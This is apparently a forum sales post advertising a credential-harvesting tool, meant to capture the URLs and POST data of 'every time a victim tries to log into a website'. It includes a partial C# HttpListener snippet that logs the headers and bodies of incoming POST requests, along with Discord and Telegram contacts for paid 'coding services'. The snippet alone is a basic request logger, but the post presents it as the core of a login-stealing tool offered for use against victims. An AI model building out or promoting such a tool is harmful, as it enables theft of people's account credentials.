#1
so this will pull raw POST data and the urls so every time a victim tries to log into a website you can get everything

heres some basic code (not the full thing)
 
Code:
 
using System;
using System.Net;

namespace HttpListenerExample
{
    class Program
    {
        static void Main(string[] args)
        {
            HttpListener listener = new HttpListener();
            listener.Prefixes.Add("http://localhost:8080/"); // replace with the URL you want to listen on
            listener.Start();
            Console.WriteLine("Listening...");

            while (true)
            {
                HttpListenerContext context = listener.GetContext();
                HttpListenerRequest request = context.Request;

                if (request.HttpMethod == "POST")
                {
                    Console.WriteLine("POST request received:");
                    Console.WriteLine(request.Headers);
                    Console.WriteLine(new System.IO.StreamReader(request.InputStream).ReadToEnd());
                }

                HttpListenerResponse response = context.Response;
                response.StatusCode = 200;
                response.Close();
            }
        }
    }
}
coding services or config services.

Discord: hina.kira
Discord ID: 1092493142747517129


Telegram: https://t.me/HighTones

SEND A LINK TO UR FORUM ACCOUNT OR I WILL NOT RESPOND.
( I need to know who I'm talking to )

I will Never Refuse OR Make Excuses not to message you on the forum.